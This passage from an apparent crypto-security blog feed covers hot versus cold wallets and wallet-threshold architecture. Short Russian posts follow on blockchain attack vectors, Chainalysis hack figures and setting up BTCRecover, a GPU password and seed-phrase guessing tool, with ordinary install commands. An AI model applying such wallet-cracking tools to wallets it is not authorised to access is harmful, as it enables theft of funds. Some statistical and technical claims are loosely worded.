• Higher risk of theft as money is stored in the cloud and is more vulnerable to cyber crooks.

• It needs to be connected to the internet all the time. Otherwise, it can’t be supported, so it could be a big problem if the internet connection fails.

Pros & Cons of Cold Wallets

Using this wallet will give you the following benefits:

• This type of wallet works without the internet, giving you a high level of security since many thefts take place on the internet.

• A cold wallet supports ERC20 or other tokens standards, which can support an unlimited number of tokens..

• You need to set a PIN code or a security code to use it.

• You can take your device anywhere.

Using one of these wallets may generate the following disadvantages:

• There is a risk of losing your device.

• You cannot trade with these types of devices.

• You need to invest around $100 to get it.

• Like any physical device, it is prone to failure, corruption, or reading problems.

Remember that if you want to trade, a hot wallet is the better option. Still, we recommend encrypting it as best you can and choosing the best software for the most significant security. On the other hand, if you are a non-trading investor and want the highest level of protection, a cold wallet will be a better choice.

How does a hot wallet storage work?

When you install a hot wallet storage into your computer or device, it allows you to buy, send and receive crypto assets without really holding any crypto. Rather it holds the private keys using which a user can initiate transactions. This is possible, as it interacts with the blockchain storing your assets.

Metamask is one of the most popular hot wallets available today. So, we will explain how a hot wallet works using Metamask.

Metamask is available as a web browser extension that acts as a bridge between the blockchain, especially Ethereum, and your browser. When you download and install Metamask and add it as your browser extension, you will be asked to either ‘import wallet’ or ‘create a wallet.’ Import wallet allows you to add an existing wallet by typing a secret recovery phrase, while the latter enables creating a new crypto wallet.

How does hot and cold wallet interact?

As all of the funds that are transferred to you come to your receiving wallet, there are chances of crypto accumulation in your receiving wallet, resulting in crypto vulnerabilities. So, you need to send most of it to the cold wallet and some to the sending wallet. You need to have a minimum amount in your receiving wallet to transfer to the sending wallet once it falls short of cryptos, and this ensures that the sending wallet has enough cryptos whenever needed. However, suppose funds are not reliably coming to the receiving wallet, and the sending wallet urgently needs currencies. In that case, you can transfer the required amount from the cold wallet to the sending wallet.

How to mitigate crypto vulnerability?

Assume that you have a total of 200 ETH in your possession, and at any time, you want to avoid risking more than 30% of your funds. Based on this calculation, you need to set maximum and minimum thresholds per wallet to reduce the severity of any malware attack. So, the receiving wallet should have a minimum of 10 ETH and a maximum of 20 ETH. Similarly, the sending wallet should possess at least 20 ETH and up to 40 ETH. The rest of your assets should be kept in the cold wallet.

If you set a threshold for your sending and receiving wallets, adhere to it and ensure that the set amount does not exceed or drop down the limit. Excess funds are prone to vulnerabilities, and you cannot produce the required amount when needed if it is below the limit. So, always maintain an adequate amount of funds

How do hot and cold wallet setups in big systems work?

Hot and cold wallet setups vary, and each setup is designed based on the developer’s requirements and thought process. Through the following infographics, let us understand how hot and cold wallet setups are designed in big systems.

In the above-given infographic, if a person wants to send x number of tokens to another user, they input a request in the front end of the application, which is fetched in the API layer or the backend of the app. The backend transfers the input request to the wallet server. In a typical wallet architecture, a wallet server handles multiple microservices like managing nodes, databases, APIs or transaction services. As the user input, in this case, is related to the transaction service, the request is sent to this microservice.

The transaction service then sends the request to the wallet microservices, which handle all services related to the wallet. The wallet microservices can vary from platform to platform. In the above infographic, the wallet microservices include the following:

• Fund management for the hot wallet – It ensures that it always sticks to its threshold without crypto overflow or deficit to prevent risk exposure.

• Whitelisted IPs – It limits the number of people who can access your domain or server to a few trusted IP addresses permitted by you.

• Token – It manages and keeps track of your tokens, like x number of ETH or x number of SOL.

• Service monitoring – This microservice checks whether all services are working without glitches.

• Thresholds – These ensure that you have the required amount in your wallet or not to send it to others.

• 2-step authentication – It is a security process where you have to verify your identity twice before accessing the wallet ecosystem.

• Notifications – It alerts users on important matters like successful transaction completion notifications.

• KMS – Key management system or KMS helps create, store, and manage it safely.

• Rotate hot wallet

When the transaction input is transferred from the transaction service to the wallet microservices, all of the above microservices are carried out. Once all the services are done, and it is ascertained that your hot wallet has enough number of tokens, the x number of tokens is sent to the receiver. The transaction is, then, said to be successfully completed.

Conclusion

Merging both hot and cold wallets can help mitigate the risk of crypto attacks for both the users and the service providers. It acts as a comfortable middle ground by offering the benefits of both wallets, where one is used for crypto trading, and the other is used to hold the cryptos safely. Even though only hot wallets were popular during the initial days of crypto emergence, usage of cold wallets is getting more popular these days. Moreover, blending hot and cold wallets is gradually gaining prominence among crypto experts and service providers, owing to its huge benefits. Using just one wallet is, thus, outdated, and people gradually realize the advantages of combining both hot and cold wallets as an additional security measure.

GitHub

Telegram: https://t.me/cryptodeeptech

Video: https://youtu.be/NrQ3oNxlrlU

Source: https://cryptodeep.ru/cold-and-hot-wallets

Криптоанализ

Блокчейн на самом деле не так безопасен, как мы склонны думать. Хотя безопасность интегрирована во все технологии блокчейна, даже самые надежные блокчейны подвергаются атакам современных киберпреступников.

Блокчейны могут довольно хорошо противостоять традиционным кибератакам, но киберпреступники придумывают новые подходы специально для взлома технологии блокчейна. Мы описываем основные векторы атак на технологию блокчейна и рассмотрим самые серьезные атаки на блокчейн на сегодняшний день.

Источник: https://cryptodeeptech.ru/blockchain-attack-vectors

Мы составили список полезных инструментов и сервисов по отслеживание незаконных действии, криптоугроз и поиска уязвимости в транзакции блокчейна. Большинство сервисов включают в себя комплексную платформу для мониторинга взлома и алгоритма процесса для безопасности криптокошельков. В криптоанализе нам всегда важен контроль и анализ транзакций. Эти сервисы полезны, во-первых, для выявление финансовых преступлений связанные с криптокошельками, во-вторых, для борьбы с отмыванием денег и в третьих для криптоугроз фишинга, а также устранение багов, ошибок и уязвимостей.

При таких темпах 2022 год, вероятно, превзойдет 2021 год как самый крупный год для взломов за всю историю наблюдений. На данный момент хакеры заработали более 3 миллиардов долларов за 125 взломов», — Chainalysis, 12 октября 2022 г., через Twitter

Аналитическая компания Chainalysis назвала октябрь 2022 года «самым большим месяцем в году с самой большой хакерской активностью», когда общая стоимость взлома за месяц почти достигла 718 миллионов долларов.

Несмотря на то, что прошло не больше половины месяца, Chainalysis сообщила, что 11 различных взломов протоколов децентрализованных финансов (DeFi) были использованы сотнями миллионов человек.

Самой большой целью хакеров являются кроссчейн-мосты: в этом месяце на три моста было нанесено 82% убытков в октябре. По данным Chainalysis, самым крупным из этих взломов моста был эксплойт примерно на 100 миллионов долларов в мосту между криптобиржей Binance BNB Smart Chain и Beacon Chain.

GitHub

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/-s8Z6df_kxY

Источник: https://cryptodeep.ru/crypto-risk-scoring

Инструменты для восстановления пароля и seed-фразы кошелька с открытым исходным кодом в репозитории Crypto Deep Tools . У многих в криптосообществе бывает ситуация, когда вы случайно потеряли или забыли часть своей мнемоники или допустили ошибку при отправке монет BTC. (Таким образом, вы либо видите пустой кошелек, либо получаете сообщение об ошибке, что ваше seed-фразa кошелька недействительно). 

BTCRecover — это инструмент для восстановления пароля и сид-фразы кошелька с открытым исходным кодом.

Перейдем к экспериментальной части:

Откроем [TerminalGoogleColab] .

Воспользуемся репозиторием «17BTCRecoverCryptoGuide» .

Команды по установке:

git clone https://github.com/demining/CryptoDeepTools.git

cd CryptoDeepTools/17BTCRecoverCryptoGuide/

ls

Устанавливаем все необходимые пакеты, модули и библиотеки

pip3 install -r requirements.txt

Использование команды lscpu, чтобы узнать архитектуру процессора Google Colab

lscpu

Установка PyOpenCL для Linux

sudo apt install python3-pyopencl

Тестирование вашей системы

python3 -m btcrecover.test.test_passwords -v GPUTests

Базовое восстановление Биткоина

GitHub

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/imTXE4rGqHw

Источник: https://cryptodeep.ru/btc-recover-crypto-guide